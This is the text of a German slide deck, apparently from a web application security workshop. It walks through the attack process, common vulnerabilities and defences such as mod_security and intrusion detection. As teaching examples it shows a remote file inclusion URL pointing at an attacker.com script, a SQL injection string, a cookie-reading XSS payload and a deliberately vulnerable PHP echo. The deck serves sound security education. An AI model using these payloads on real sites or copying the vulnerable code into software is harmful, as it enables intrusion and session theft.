Web Application Security

Agenda • Einführung und Einordung • Grundlagen Web Applications • Angriff • Verteidigung • Praktischer Teil • Fazit

Einführung

Was ist Security?

Security is a process Bruce Schneier

Angriff Angriff Ziel

Verteidigung Angriff Prevention Detection Response Ziel

Prevention Maßnahmen, die einen Angriff im Vorhinein erschweren sollen Reallife: Tür und Schloß an Euren Häusern IT: Firewalls, ACLs / Rechtemanagement

Detection Maßnahmen, die einen Angriff erkennen sollen Reallife: Alarmanlage im Haus IT: Intrusion Detection Systems, Networks Security Monitoring, Trafﬁc Anomaly

Response Reaktion auf einen Angriff Reallife: Ihr ruft die Polizei, diese probiert den Einbrecher festzunehmen. Beweise werden gesammelt IT: Runterfahren des Rechners, forensiche Analyse

Agenda Angriff Prevention Detection Response Ziel Vorletztes Letzes Workend Workend

Agenda Dieser Workshop Angriff Prevention Detection Response Ziel Im Speziellen für Web Applications

Attack the enemy

Der Prozess Ziel auskundschaften

Der Prozess Ziel auskundschaften Schwachstellen ausﬁndigmachen

Der Prozess Ziel auskundschaften Schwachstellen ausﬁndigmachen Schwachstellen ausnutzten

Der Prozess Ziel auskundschaften Schwachstellen ausﬁndigmachen Schwachstellen ausnutzten Position sichern

Der IT-Prozess Ziel auskundschaften Passive Informationsgewinnung Aktive Informationsgewinnung Schwachstellen ausﬁndigmachen Remote Exploit Schwachstellen Local Exploit ausnutzten Rootkit Installation Position sichern Weitere Expansion

Angriff Passive Aktive Remote Local Root- Expan- IG IG Exploit Exploit kit sion - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........

Verteidigung Passive Aktive Remote Local Root- Expan- IG IG Exploit Exploit kit sion - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........

Grundlagen Web Applications

Statische Webseite GET http://www.juniter.de/index.html index.html

Dynamische Webseite GET http://www.juniter.de/index.php MySQL PHP index.php

Angriff

Angriff Passive Aktive Remote IG IG Exploit - ........ - ........ - ........ - ........ - ........ - ........

Ziel Informationen über • eingesetzten Server (Apache, IIS, ..) • Skriptsprache (PHP, JSP, ASP, Perl, Rails)

Mittel • Versiongrabbing / Verbinden • Typische Endungen • .php • .jsp • .do • .asp aspx

Angriff Passive Aktive Remote IG IG Exploit - ........ - ........ - ........ - ........ - ........ - ........

Ziel • Webseite manipulieren • Datenbank manipulieren • Lokaler Benutzer für weitere Aktivitäten

Mittel Sicherheitslücken in • Serversoftware • Application Server • Programmiersprache • eigentliches Programm ausnutzen

Typische Schwachstellen • Remote code execution • SQL injection • Format string vulnerabilities • Cross Site Scripting (XSS) • Username enumeration

Remote code execution • register_globals • XMLRPC Schwachstellen

require ($page . \".php\"); http://www.vulnsite.com/index.php? page=http://www.attacker.com/attack.txt

Remote code execution http://www.vulnsite.com/index.php?page=http:// www.attacker.com/attack.txt

SQL Injection Idee: SQL-Anweisung im Code durch die HTML Parameter manipulieren

$query = \"SELECT * FROM users WHERE username = 'steve'\";

$query = \"SELECT * FROM users WHERE username = '' or '1=1'\";

Cross Site Scripting Idee: Dem Server JavaScript Code übergeben, den er anderen Nutzern anzeigt. Diese führen dann diesen Code aus

Cross Site Scripting Wirkung: Cookies und somit Logins stehlen

<form action=\"search.php\" method=\"GET\" /> Welcome!! <p>Enter your name: <input type=\"text\" name=\"name_1\" /><br /> <input type=\"submit\" value=\"Go\" /></p><br> </form> <?php echo \"<p>Your Name <br />\"; echo ($_GET[name_1]); ?>

http://victim_site/clean.php?name_1=<script>code</script> http://victim_site/clean.php?name_1=<script>alert (document.cookie);</script>

Username enumeration Idee: Finden von gültigen Benutzernamen durch Testen der Reaktion auf Username/ Passwort Kombination

Username enumeration Wirkung: Bruteforce und Guessing Attacken auf Benutzerkonten deutlich leichter

Username enumeration Der angegebene Login existiert nicht Die angegebene Login/Passwort Kombination stimmt nicht

Verteidigung

Verteidigung Passive Aktive Remote IG IG Exploit - ........ - ........ - ........ - ........ - ........ - ........

Prevention Vorbeugen durch: • Versionsanzeigen abschalten/verfremden • Intrusion Prevention Systeme

Detection Erkennen durch: • Intrusion Detection Systeme • Firewall Logfiles • Serverlogfiles, z.B. UserAgent in Apache Logfile

Verteidigung Passive Aktive Remote IG IG Exploit - ........ - ........ - ........ - ........ - ........ - ........

Prevention Vorbeugen durch: • Systeme immer aktuell halten • Applikation Firewalls / Filter • mod_security • Intrusion Prevention Systeme • Snort-Inline

Secure Coding !

Detection Erkennen durch: • Intrusion Detection Systeme • Logﬁles • Netzwerküberwachung • netstat • Network Security Monitoring

Fazit

Ressourcen

Bücher • Unix and Internet Security, Simson Garﬁkel&co, O’Reilly • Network Security Assesment, ..., O’Reilly • Network Security Monitoring, Richard Beijtrich, Addison-Wesley • Security Warrior, ..., O’Reilly • Practical Cryptography, Bruce Schneier&Nils Fergusson,... • ..., Bruce Sterling, ...

Mailing Listen • Bugtraq • Full-Disclosure • SecurityFocus • IDS • WebAppSec • Nmap

Web • Securityfocus.com • OWASP • Phrack.org • grc.com • CVE, MITRE, ISS X-Force

Fragen?

Web Application Security

0 comments

Notes on slide 1

Favorites, Groups & Events